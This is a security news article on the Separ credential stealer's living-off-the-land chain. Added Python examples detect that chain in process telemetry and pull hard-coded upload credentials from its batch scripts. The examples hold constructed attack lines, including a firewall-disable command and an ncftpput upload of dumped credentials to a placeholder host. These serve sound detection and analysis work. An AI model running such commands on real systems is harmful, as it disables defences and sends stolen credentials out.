
Hard-to-detect credential-theft malware has infected 1,200 and is still going


A seemingly simple malware attack has stolen a wide range of credentials from thousands of computers in recent weeks and continues to steal more, a researcher reported on Tuesday.

The ongoing attack is the latest wave of Separ, a credential stealer that has been known to exist since at least the end of 2017, said a researcher with the security firm Deep Instinct. In recent weeks, the researcher said, Separ has returned in a new version that has proved surprisingly adept at evading malware detection software and services. The source of its success: a combination of short scripts and legitimate executable files that are used so often for benign purposes that the malware blends in perfectly. Building malware out of legitimate apps and utilities has been called "living off the land," and it has been used in a variety of highly effective campaigns in recent years.

The latest Separ arrives as what appears to be a PDF document. Once clicked, the file runs a chain of other apps and file types commonly used by system administrators. An inspection of the servers used in the campaign shows that, so far, it has collected credentials belonging to about 1,200 organizations or individuals. The number of infections continues to rise, an indication that the spartan approach is effective in helping the malware fly under the radar.

"Although the attack mechanism used by this malware is very simple and no attempt has been made by the attacker to circumvent analysis, the growth in the number of victims reported by this malware shows that simple attacks can be very effective," wrote Guy Propper, head of the Deep Instinct threat intelligence team, in a blog post. "The use of legitimate scripts and binaries, in a 'living off the land' scenario, means that the attacker manages to circumvent detection, despite the simplicity of the attack."

The contents of the first batch script. (Image: Deep Instinct)

In this latest wave, Separ is packaged in a self-extracting executable that uses an icon to disguise itself as a PDF document. When run, it executes a chain of files that starts with a Visual Basic script. The VBS in turn executes a batch script, which sets up several directories, copies files, and then starts a second batch script. The second script opens a fake image to hide the command windows, lowers firewall protections, and saves the output of an ipconfig /all command to a file.

The contents of the second batch script. (Image: Deep Instinct)

The batch file then executes four executable tools used for legitimate purposes. The first two are password-dumping tools from the SecurityXploded security research organization. The third runs the legitimate NcFTP client to upload the stolen data to previously configured accounts on a hosting service. The fourth bundles the legitimate apps xcopy.exe, attrib.exe and sleep.exe, which the malware uses for trivial housekeeping tasks.
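The chain described above (script host, then cmd.exe, then firewall changes, ipconfig /all and an FTP upload) is exactly what a process-tree detection can key on: each binary is a legitimate admin tool, so the signal is the combination under one script-interpreter ancestry, not any single command. The following Python is an added example written for this page, not code from Deep Instinct or from the campaign. The event format (a simplified Sysmon Event ID 1 style record with pid, ppid, image path and command line) and the sample events themselves are constructed for illustration; the file names, host name and credentials in them are invented.

```python
"""Detect a Separ-style living-off-the-land chain in process-creation telemetry.

Added example, not Deep Instinct's code. Event records are an assumed,
simplified Sysmon Event ID 1 shape; SAMPLE_EVENTS is constructed, not captured.
"""
import re
from collections import defaultdict

# Constructed sample telemetry. A disguised self-extracting archive launches
# wscript.exe, which spawns cmd.exe twice (two batch scripts), and the second
# batch script runs the LOLBins the article describes.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Users\u\AppData\Local\Temp\Invoice.exe", "cmd": "Invoice.exe"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe", "cmd": r'wscript.exe "C:\Users\u\AppData\Local\Temp\run.vbs"'},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\cmd.exe", "cmd": r'cmd.exe /c "C:\Users\u\AppData\Local\Temp\stage1.bat"'},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\cmd.exe", "cmd": r'cmd.exe /c "C:\Users\u\AppData\Local\Temp\stage2.bat"'},
    {"pid": 510, "ppid": 500, "image": r"C:\Windows\System32\netsh.exe", "cmd": "netsh advfirewall set allprofiles state off"},
    {"pid": 520, "ppid": 500, "image": r"C:\Windows\System32\ipconfig.exe", "cmd": "ipconfig /all"},
    {"pid": 530, "ppid": 500, "image": r"C:\Users\u\AppData\Local\Temp\ncftpput.exe", "cmd": "ncftpput -u ftpuser -p hunter2 ftp.example.invalid /up dump.txt"},
    # Benign contrast 1: a logon script under wscript that only runs ipconfig.
    {"pid": 700, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe", "cmd": r"wscript.exe \\fs01\netlogon\logon.vbs"},
    {"pid": 710, "ppid": 700, "image": r"C:\Windows\System32\ipconfig.exe", "cmd": "ipconfig /all"},
    # Benign contrast 2: ipconfig with no script-host ancestor at all.
    {"pid": 900, "ppid": 1,   "image": r"C:\Windows\System32\svchost.exe", "cmd": "svchost.exe -k netsvcs"},
    {"pid": 910, "ppid": 900, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c ipconfig /all"},
    {"pid": 920, "ppid": 910, "image": r"C:\Windows\System32\ipconfig.exe", "cmd": "ipconfig /all"},
]

# Each behaviour alone is routine admin activity; the detection fires only
# when several of them share one wscript/cscript ancestor.
INDICATORS = {
    "firewall_tamper": re.compile(r"\bnetsh\s+(advfirewall|firewall)\b.*\b(off|disable)\b", re.I),
    "recon_ipconfig": re.compile(r"\bipconfig(\.exe)?\s+/all\b", re.I),
    "ftp_exfil": re.compile(r"\bncftp(put)?(\.exe)?\b.*\s-u\s", re.I),
}
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def script_host_ancestor(pid, by_pid):
    """Walk up the parent chain from pid; return the pid of the nearest
    wscript/cscript process, or None if there is none in the tree we know."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        ev = by_pid[pid]
        if _basename(ev["image"]) in SCRIPT_HOSTS:
            return pid
        pid = ev["ppid"]
    return None


def detect_lotl_chain(events, min_indicators=2):
    """Group indicator hits by their script-host ancestor and alert when a
    single script host accounts for at least min_indicators distinct ones."""
    by_pid = {e["pid"]: e for e in events}
    hits = defaultdict(dict)  # script-host pid -> {indicator name: command line}
    for ev in events:
        for name, rx in INDICATORS.items():
            if rx.search(ev["cmd"]):
                root = script_host_ancestor(ev["pid"], by_pid)
                if root is not None:
                    hits[root][name] = ev["cmd"]
    alerts = []
    for root, found in hits.items():
        if len(found) >= min_indicators:
            alerts.append({
                "script_host_pid": root,
                "script": by_pid[root]["cmd"],
                "indicators": dict(sorted(found.items())),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_lotl_chain(SAMPLE_EVENTS):
        print(alert)
```

Run stand-alone it prints one alert, rooted at the wscript.exe that launched run.vbs, carrying all three indicators; the logon script (one indicator) and the svchost-rooted ipconfig (no script host) stay quiet. The threshold is the tuning knob: two indicators catches the chain early, before the upload, at the cost of more review of admin scripts that touch the firewall.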

An email password dump with credentials redacted, alongside ipconfig data. (Image: Deep Instinct)

"As you can see above, the attackers do not try to hide their intentions and do not use obfuscation or evasion techniques," wrote Propper. "Also, all the names of the output files and the credentials used by the attackers are hard-coded in the scripts."

Turning the tables on the bad guys

The hard-coded credentials allowed Deep Instinct to turn the tables on the attackers and access two of the accounts used to store the stolen data. Later, the researchers obtained access to eight other accounts. As of Tuesday afternoon, the accounts stored credentials belonging to about 1,000 individuals and 200 organizations. The haul has grown steadily over the past few weeks, and the researchers suspect there may be additional accounts holding even more.
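Propper's observation that the output file names and upload credentials are hard-coded, and the researchers' use of those credentials to reach the drop accounts, both come down to the same triage step: reading the batch script for the ncftpput invocation and the redirection targets. The following Python is an added example written for this page, not code from Deep Instinct or from the campaign. SAMPLE_BAT is a constructed script that mirrors the behaviours the article describes (decoy image, firewall change, ipconfig capture, two dumper binaries, ncftpput upload); the host, user name, password and file names in it are invented, and the dumper names are placeholders rather than the real SecurityXploded tool names.

```python
"""Static triage of a Separ-style batch script: recover the hard-coded
upload credentials and output file names the scripts leave in the clear.

Added example, not Deep Instinct's code. SAMPLE_BAT is constructed; its
host, user name, password, tool names and file names are invented.
"""
import re

SAMPLE_BAT = r"""@echo off
start "" decoy.jpg
netsh advfirewall set allprofiles state off
ipconfig /all > %TEMP%\info.txt
browserdump.exe > %TEMP%\browser.txt
maildump.exe > %TEMP%\email.txt
ncftpput -u uploader01 -p S3cretPass ftp.example.invalid /incoming %TEMP%\info.txt %TEMP%\browser.txt %TEMP%\email.txt
"""

OUTPUT_REDIRECT = re.compile(r">>?\s*(\S+)")
FIREWALL_TAMPER = re.compile(r"\bnetsh\s+(advfirewall|firewall)\b.*\b(off|disable)\b", re.I)

# ncftpput options that consume the following token. Kept to the ones that
# matter here (user, password, port, login config); this is a simplification,
# not the tool's full option table.
NCFTP_ARG_FLAGS = {"-u", "-p", "-P", "-f"}


def parse_ncftpput(line):
    """Parse 'ncftpput [-u user] [-p pass] host remote-dir local-file...'.
    Returns None if the line is not an ncftpput invocation."""
    tokens = line.split()
    if not tokens:
        return None
    name = tokens[0].strip('"').rsplit("\\", 1)[-1].lower()
    if name not in ("ncftpput", "ncftpput.exe"):
        return None
    creds = {"user": None, "password": None, "host": None, "remote_dir": None, "files": []}
    positional = []
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok in NCFTP_ARG_FLAGS and i + 1 < len(tokens):
            if tok == "-u":
                creds["user"] = tokens[i + 1]
            elif tok == "-p":
                creds["password"] = tokens[i + 1]
            i += 2
            continue
        if tok.startswith("-"):
            i += 1  # bare flag such as -R or -v
            continue
        positional.append(tok)
        i += 1
    if len(positional) >= 2:
        creds["host"], creds["remote_dir"] = positional[0], positional[1]
        creds["files"] = positional[2:]
    return creds


def triage_script(text):
    """Walk the script line by line and collect the artefacts an analyst
    needs: upload credentials, redirected output files, firewall tampering."""
    report = {"upload_credentials": [], "output_files": [], "firewall_tamper": False}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.lower().startswith(("rem ", "::")):
            continue
        if FIREWALL_TAMPER.search(line):
            report["firewall_tamper"] = True
        for m in OUTPUT_REDIRECT.finditer(line):
            target = m.group(1)
            if target not in report["output_files"]:
                report["output_files"].append(target)
        parsed = parse_ncftpput(line)
        if parsed:
            report["upload_credentials"].append(parsed)
    return report


def redacted(report):
    """Copy of the report with passwords masked, safe to paste into a writeup."""
    out = {**report, "upload_credentials": []}
    for c in report["upload_credentials"]:
        pw = c["password"]
        masked = None if pw is None else pw[:1] + "*" * (len(pw) - 1)
        out["upload_credentials"].append({**c, "password": masked})
    return out


if __name__ == "__main__":
    print(redacted(triage_script(SAMPLE_BAT)))
```

The unredacted report is what let the researchers log into the drop accounts; the redacted form is the one that belongs in a public writeup. The output file names double as host-based indicators, since the same names are written on every victim.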

So far, Propper said, Freehostia officials had not responded to Deep Instinct's private messages reporting abuse of the hosting service. A message Ars sent to Freehostia seeking comment for this post went unanswered. Propper said Deep Instinct has notified the infected people and organizations that their credentials have been collected.

The only thing the recent Separ campaign required, at least initially, was for an end user to click on a disguised executable. Propper said that, over time, a growing number of antimalware vendors have come to detect the attack. Still, the ongoing infections show that despite the increasing sophistication of many of today's malware attacks, simple, scattershot attacks remain painfully effective.
